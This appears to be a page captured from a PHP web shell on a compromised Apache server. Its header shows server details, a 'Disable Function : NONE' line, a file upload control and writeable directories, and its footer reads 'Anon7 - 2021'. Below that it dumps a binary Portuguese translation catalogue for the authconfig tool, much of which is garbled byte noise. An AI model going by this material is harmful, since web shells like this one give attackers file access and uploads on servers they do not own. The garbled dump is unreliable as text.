KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/locale/pt/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/locale/pt/LC_MESSAGES/authconfig.mo
T7hNi		$
0
;IO^^{(#;BWhz;+6bnu4I] u!1=Ig29
ESjoxk
+?!Dfko|Y	$7
ht%5F; "Q !t " 
     !!#!8!@!L!#g!!!!![!}6""""""##
####1$/=$m$$$2$	$$$$%"%
2%(=%0f%0%1%%&.&)I&[s&_&+/'6['''''''((:(5Q( ((*(,( )+6)%b)1).).)**%C*(i****-*/+$8+<]+5+=+1,7@,+x,>,),+
-9-*Y-$-0----.)6.$`.'.)..,.. /#O/4s/&/>/ 01/0(a0D0)000**1U1e1G1F;2D24223/3'C3Qk3P6777&777
<7G7	^7h7
p7{77
7777 7o7	a8?k888188 9'9;9N9d9|9999D9-:H:U:^:x::	::::;;6;L;a;!z;;4<J<V<b<|=}========>>>>>>!>???
'?
5?]C???????????w@@	@@@@v@WAB%BBCxDEDE,E+E0EF$F
6FDFaFuFFFFFF1F'G$AGfGGGHHH"HHIIII
JJ$ J9EJ;JJJJ@J0K"7KZK+aKKKK3K>K89LDrLLL:L?MtVMyM>ENANNNNO2OJObO.|OOBO(
P3P0JP1{P"P3P*Q9/Q@iQ3Q/Q%R<4R5qR)R3R4S6:S>qS?SFS&7T<^T*TRT-U.GUvU0U'U6UP&V2wV,V"V9V;4W&pW0W3W3WG0X:xXDX#X:Y2WYTY3Y7Z1KZ}ZZ:/[7j[;[G[&\/;\k\>\Vru8*.{&OX~%q'@
|Fmv<"jw_d Y6$EM)ip\x-BQk?WDRI,5[0	>^g=SC4(9fsTbNc#HUh`!lJ7t]3Gn
Z/oKzL2e1;:+a}APy <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screen*<URL><b>Options</b><b>Smart Card</b><dn><domain><lowest-highest><module><realm><server><servers><workgroup>ADS Realm:Admin Server:AlertAuthenticationAuthentication ConfigurationAuthentication module %s/pam_%s.so is missing. Authentication process will not work correctly.BackBad smart card removal action specified.Base DN:Cache InformationCache User _InformationCancelCard Removal _ActionCertificate _URLCon_figure SMB...Configure H_esiod...Configure K_erberos...Configure L_DAP...Configure NI_S...Configure Sma_rt Card...Configure Win_bind...Control how the system verifies users who attempt to log inCreate _home directories on the first loginDo_n't SaveDomainDomain Administrator:Domain Controllers:Domain _AdministratorDomain:Download CA CertificateEnable SMB S_upportEnable Smart _Card SupportEnable _Hesiod SupportEnable _Kerberos SupportEnable _LDAP SupportEnable _NIS SupportEnable _Winbind SupportError downloading CA certificateFor user accounts maintained in local /etc/passwd file system will not check authorization from network services such as LDAP or Kerberos.Hesiod SettingsHesiod _LHSHesiod _RHSHesiod allows a system administrator to publish user and group information in DNS.  It is sometimes used in very large networks.If the home directory of an user doesn't exist yet it will be created automatically on his first login.IgnoreJoin DomainJoin SettingsJoining Winbind DomainKDC:KerberosKerberos SettingsKerberos is a trusted third-party authentication system which is commonly used in medium to large networks.LDAPLDAP Search _Base DNLDAP SettingsLDAP _ServerLDAP authenticationLHS:Local authorization is sufficientLockNISNIS SettingsNIS _DomainNIS _ServerNIS is the Network Information Service.  It is commonly used on small to medium networks.NextNoOkOptionsPassword:RHS:Realm:SMB SettingsSMB authenticationSMB authentication verifies user passwords by attempting to connect to a server which uses the SMB (system message block) protocol suite.Save SettingsSecurity Model:Server:Servers:Shell:Smart Card SettingsSmart card authentication allows you to log in using a certificate and key associated with a smart card.Some of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?Template Shell:The %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.The Lightweight Directory Access Protocol is a standard way of searching a directory, which can hold arbitrary data in a structured hierarchy. LDAP is increasingly being used in small to large networks.To connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.To verify the LDAP server with TLS protocol enabled you need a CA certificate which signed the server's certificate. Please fill in the URL where the CA certificate in the PEM format can be downloaded from.Unknown password hashing algorithm specified, using sha256.Use DNS to _locate KDCs for realmsUse DNS to locate KDCs for realmsUse DNS to resolve hosts to realmsUse HesiodUse KerberosUse LDAPUse LDAP AuthenticationUse MD5 PasswordsUse NISUse SMB AuthenticationUse Shadow PasswordsUse TLSUse WinbindUse Winbind AuthenticationUse _DNS to resolve hosts to realmsUse _Shadow PasswordsUse _TLS to encrypt connectionsUser InformationWarningWhen enabled /etc/security/access.conf will be consulted for authorization of users access.When enabled allows network services such as LDAP or Kerberos to authenticate system accounts including root on this machine.WinbindWinbind ADS _RealmWinbind Domain Co_ntrollersWinbind SettingsWinbind _DomainWinbind allows a system to retrieve information about users and to authenticate users by using information stored in an NTDOM or ADS server.  It is used in small to large networks.Winbind authenticationWorkgroup:Yes_Admin Servers_Allow offline login_Authenticate system accounts by network services_Check access.conf during account authorization_Domain Controllers_Join Domain_KDCs_Local authorization is sufficient for local users_Password_Password hashing algorithm_Realm_Require smart card for login_Security Model_Template Shell_Workgroupaction to be taken on smart card removalauthenticate system accounts by local files onlyauthenticate system accounts by network servicesauthorize local users also through remote servicecachingcan only be run as rootcheck access.conf during account authorizationconfigures winbind to allow offline loginconfigures winbind to assume that users with no domain in their user names are domain usersconfigures winbind to assume that users with no domain in their user names are not domain usersconfigures winbind to prevent offline logincreate home directories for users on their first logindefault LDAP base DNdefault LDAP serverdefault NIS domaindefault NIS serverdefault hesiod LHSdefault hesiod RHSdefault kerberos KDCdefault kerberos admin serverdefault kerberos realmdefault realm for samba and winbind when security=adsdefault smart card module to usedialog was cancelleddisable LDAP for authentication by defaultdisable LDAP for user information by defaultdisable MD5 passwords by defaultdisable NIS for user information by defaultdisable SMB authentication by defaultdisable authentication with smart card by defaultdisable caching of user information by defaultdisable hesiod for user information by defaultdisable kerberos authentication by defaultdisable shadowed passwords by defaultdisable use of DNS to find kerberos KDCsdisable use of DNS to find kerberos realmsdisable use of TLS with LDAPdisable winbind for authentication by defaultdisable winbind for user information by defaultdisable wins for hostname resolutiondisplay Back instead of Cancel in the main dialog of the TUIdo not check access.conf during account authorizationdo not create home directories for users on their first logindo not display the deprecated text user interfacedo not require smart card for authentication by defaultdo not start/stop portmap, ypbind, and nscddo not update the configuration files, only print new settingsenable LDAP for authentication by defaultenable LDAP for user information by defaultenable MD5 passwords by defaultenable NIS for user information by defaultenable SMB authentication by defaultenable authentication with smart card by defaultenable caching of user information by defaultenable hesiod for user information by defaultenable kerberos authentication by defaultenable shadowed passwords by defaultenable use of DNS to find kerberos KDCsenable use of DNS to find kerberos realmsenable use of TLS with LDAPenable winbind for authentication by defaultenable winbind for user information by defaultenable wins for hostname resolutiongid range winbind will assign to domain or ads usershash/crypt algorithm for new passwordsjoin the winbind domain or ads realm now as this administratorload CA certificate from the URLlocal authorization is sufficient for local usersnames of servers to authenticate againstopposite of --test, update configuration files with changed settingsprobe network for defaults and print themrequire smart card for authentication by defaultsecurity mode to use for samba and winbindshadow passwordthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enabledthe directory which winbind-created users will have as home directoriesthe group which winbind-created users will have as their primary groupthe shell which winbind-created users will have as their login shelluid range winbind will assign to domain or ads usersunexpected argumentupdate all configuration filesusage: %s [options]workgroup authentication servers are inProject-Id-Version: authconfig
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2008-01-09 21:30+0100
PO-Revision-Date: 2008-01-26 15:37+0000
Last-Translator: Pedro Morais <morais@kde.org>
Language-Team: pt <morais@kde.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-POFile-SpellExtra: DN Information hesiod uid Service Access PEM NTDOM
X-POFile-SpellExtra: ypbind admin Network Winbind Kerberos KDC Admin gid
X-POFile-SpellExtra: test Shadow ADS winbind CA kerberos portmap caching
X-POFile-SpellExtra: LHS Directory shadow info MD Hesiod Protocol
X-POFile-SpellExtra: winbindusedefaultdomain wins RHS KDCs Lightweight
X-POFile-SpellExtra: nscd inform Adminstrador ads so pam passwd smartcard
X-POFile-IgnoreConsistency: User Information
X-POFile-SpellExtra: Smartcard smartcards Smartcards AC access conf
 <Tab>/<Alt-Tab> entre elementos  | <Espaço> selecciona  | <F12> próximo ecrã*<URL><b>Opções</b><b>Smartcard</b><dn><domínio><mais baixo-mais alto><módulo><reino><servidor><servidores><grupo de trabalho>Reino ADS:Servidor de admin:AlertaAutenticaçãoConfiguração da AutenticaçãoFalta o módulo de autenticação %s/pam_%s.so. O processo de autenticação não irá funcionar correctamente.RegressarFoi indicada uma acção inválida de remoção do 'smartcard'.DN base:Informações de CacheManter um _Cache de Informações de UtilizadoresCancelar_Acção de Remoção do Cartão_URL do Certificado_Configurar SMB..._Configurar Hesiod..._Configurar Kerberos..._Configurar LDAP..._Configurar NIS...Configurar o Sma_rtcard..._Configurar Winbind...Controla como o sistema verifica os utilizadores que se tentam ligarCriar as _pastas pessoais na primeira sessão_Não GravarDomínioAdminstrador do Domínio:Controladores do Domínio:Adminstrador do _DomínioDomínio:Obter o Certificado da ACActivar Suporte _SMBActivar Suporte de Smart_cardActivar Suporte _HesiodActivar Suporte _KerberosActivar Suporte _LDAPActivar Suporte _NISActivar Suporte _WinbindErro ao obter o certificado da ACPara as contas do utilizador mantidas no ficheiro /etc/passwd local, não será feita a autorização dos serviços de rede, como o LDAP ou o Kerberos.Configuração Hesiod_LHS Hesiod_RHS HesiodO Hesiod permite a um administrador de sistemas publicar informações acerca de utilizadores e grupos no DNS. É por vezes utilizado em redes muito grandes.Se a pasta pessoal de um utilizador ainda não existir, será criada automaticamente quando este se ligar pela primeira vez.IgnorarDomínio a JuntarConfiguração de JunçãoA Juntar ao Domínio WinbindKDC:KerberosConfiguração KerberosKerberos é um sistema de autenticação baseado numa terceira entidade de confiança que é normalmente utilizado em redes médias a grandes.LDAPDN de _Base para Procuras LDAPConfiguração LDAP_Servidor LDAP:Autenticação LDAPLHS:Autorização local é suficienteBloquearNISConfiguração NIS_Domínio NIS_Servidor NISNIS é o Network Information Service.  É normalmente utilizado em redes pequenas ou médias.AvançarNãoOkOpçõesSenha:RHS:Reino:Configuração SMBAutenticação SMBA autenticação SMB verifica as senhas dos utilizadores tentando ligar-se a um servidor que utilize o conjunto de protocolos SMB.Gravar ConfiguraçãoModelo de Segurança:Servidor:Servidores:'Shell':Configuração do 'Smartcard'A autenticação com 'smartcards' permite-lhe autenticar-se com um certificado e uma chave associada a um 'smartcard'.Algumas da alterações de configuração efectuadas devem ser gravadas antes de continuar.  Se não as gravar, a sua tentativa de se juntar a um domínio pode falhar.  Gravar alterações?'Shell' Modelo:O ficheiro %s não foi encontrado, mas é necessário para que o suporte a %s funcione correctamente. Instale o pacote %s, que contém este ficheiro.O Lightweight Directory Access Protocol é um método normalizado de efectuar procuras num directório, que pode conter dados arbitrários numa hierarquia estruturada. O LDAP é cada vez mais utilizado em redes pequenas a grandes.Para se ligar correctamente a um servidor LDAP com o protocolo TLS deve ter um certificado CA que assinou o certificado do seu servidor. Copie o certificado no formato PEM para a pasta '%s'.
Depois carregue em OK.Para verificar o servidor de LDAP com o protocolo TLS deve ter um certificado CA que assinou o certificado do seu servidor. Preencha por favor o URL onde se pode obter o certificado da CA no formato PEM.Foi indicado um algoritmo de dispersão de senhas; a usar o 'sha256'.Uti_lizar DNS para procurar KDCs para reinosUtilizar DNS para procurar KDCs para reinosUtilizar DNS para resolver máquinas para reinosUtilizar HesiodUtilizar KerberosUtilizar LDAPUtilizar Autenticação LDAPUtilizar Senhas MD5Utilizar NISUtilizar Autenticação SMBUtilizar Senhas "Shadow"Utilizar TLSUtilizar WinbindUtilizar Autenticação WinbindUtilizar _DNS para resolver máquinas para reinosUtilizar Senhas "_Shadow"Utilizar _TLS para cifrar ligaçõesInformações de UtilizadoresAvisoQuando estiver activada a opção, o '/etc/security/access.conf' será consultado para saber a autorização de acesso dos utilizadores.Quando estiver activo, permite aos serviços de rede, como o LDAP ou o Kerberos, autenticarem as contas do sistema, incluindo o 'root', nesta máquina.Winbind_Reino Winbind ADSCo_ntroladores do Domínio WinbindConfiguração Winbind_Domínio WinbindO Winbind permite a um sistema obter informações acerca dos utilizadores e autenticá-los utilizando dados armazenados num servidor NTDOM ou ADS.  É utilizado desde em redes pequenas até redes grandes.Autenticação WinbindGrupo de trabalho:SimServidores _AdminPermitir a _autenticação desligada_Autenticar as contas do sistema com os serviços de redeVerifi_car o 'access.conf' durante a autorização da contaControladores do _DomínioDomínio a _Juntar_KDCsA autorização _local é suficiente para os utilizadores locais_SenhaAlgoritmo de dis_persão de senhas_ReinoNecessita de 'sma_rtcard' na autenticaçãoModelo de _Segurança'Shell' _Modelo_Grupo de Trabalhoa acção a tomar em caso de remoção do Smartcardautenticar as contas do sistema apenas com os ficheiros locaisautenticar as contas do sistema com os serviços da redeautorizar os utilizadores locais também através de serviço remoto'cache'só pode correr como 'root'verificar o 'access.conf' durante a autorização da contaconfigurar o 'winbind' para permitir a autenticação desligadaconfigura o winbind para assumir que utilizador sem domínio no seu nome de utilizador são utilizadores de domínioconfigura o winbind para assumir que utilizador sem domínio no seu nome de utilizador não são utilizadores de domínioconfigurar o 'winbind' para proibir a autenticação desligadacriar as pastas pessoais dos utilizadores na sua primeira sessãoDN base de LDAP por omissãoservidor LDAP por omissãodomínio NIS por omissãoservidor NIS por omissãoLHS hesiod por omissãoRHS hesiod por omissãoKDC kerberos por omissãoservidor administração kerberos por omissãoreino kerberos por omissãoreino por omissão para samba e winbind quando a segurança é adsmódulo predefinido de Smartcards a usara janela foi canceladadesactivar ldap para autenticação por omissãodesactivar ldap para info utilizador por omissãodesactivar senhas MD5 por omissãodesactivar NIS para inform. utilizador por omissãodesactivar autenticação SMB por omissãodesactivar a autenticação com 'smartcards' por omissãodesactivar a cache de informações de utilizadores por omissãodesactivar hesiod para info utilizador por omissãodesactivar autenticação kerberos por omissãodesactivar senhas shadow por omissãodesactivar a utilização de DNS para procurar KDCs kerberosdesactivar o uso do DNS para procurar reinos kerberosdesactivar a utilização de TLS com ldapdesactivar winbind para autenticação por omissãodesactivar winbind para info utilizador por omissãodesactivar wins para resolução de nomes de máquinasmostrar o Recuar em vez de Cancelar na janela principal da TUInão verificar o 'access.conf' durante a autorização da contanão criar as pastas pessoais dos utilizadores na sua primeira sessãonão mostrar a interface em modo texto'smartcard' não obrigatório na autenticação por omissãonão iniciar/parar portmap, ypbind, e nscdnão activar os ficheiros de configuração, apenas imprimir a configuração novaactivar ldap para autenticação por omissãoactivar ldap para info utilizador por omissãoactivar senhas MD5 por omissãoactivar NIS para inform. utilizador por omissãoactivar autenticação SMB por omissãoactivar a autenticação com 'smartcards' por omissãoactivar a manutenção por omissão de um cache de informações de utilizadoresactivar hesiod para info utilizadores por omissãoactivar autenticação kerberos por omissãoactivar senhas shadow por omissãoactivar a utilização de DNS para procurar KDCs kerberosactivar a utilização de DNS para procurar reinos kerberosactivar a utilização de TLS com ldapactivar winbind para autenticação por omissãoactivar winbind para info utilizadores por omissãoactivar wins para resolução de nomes de máquinasgama de gid que o winbind atribui a utilizadores de 'domínio' ou 'ads'algoritmo de encriptação/dispersão para as senhas novasligar ao domínio winbind ou reino ads agora como este administradorcarregar o certificado da AC do URLautorização local é suficiente para utilizadores locaisnomes dos servidores que realizam a autenticaçãoo oposto do '--test', actualiza os ficheiros de configuração com as modificaçõesprocurar valores por omissão na rede e imprimi-los'smartcard' obrigatório na autenticação por omissãomodo de segurança a utilizar com samba e winbindSenhas "shadow"o caracter utilizado para separar o domínio e o nome de utilizador nos nomes de utilizadores criados pelo winbind se winbindusedefaultdomain não estiver activoa directoria pessoal dos utilizadores criados pelo winbindo grupo primário dos utilizadores criados pelo winbinda 'shell' utilizada pelos utilizadores criados pelo winbindgama de uid que o winbind atribui a utilizadores de 'domínio' ou 'ads'argumento inesperadoactualizar todos os ficheiros de configuraçãoutilização: %s [opções]os servidores de autenticação do grupo de trabalho estão em

Anon7 - 2021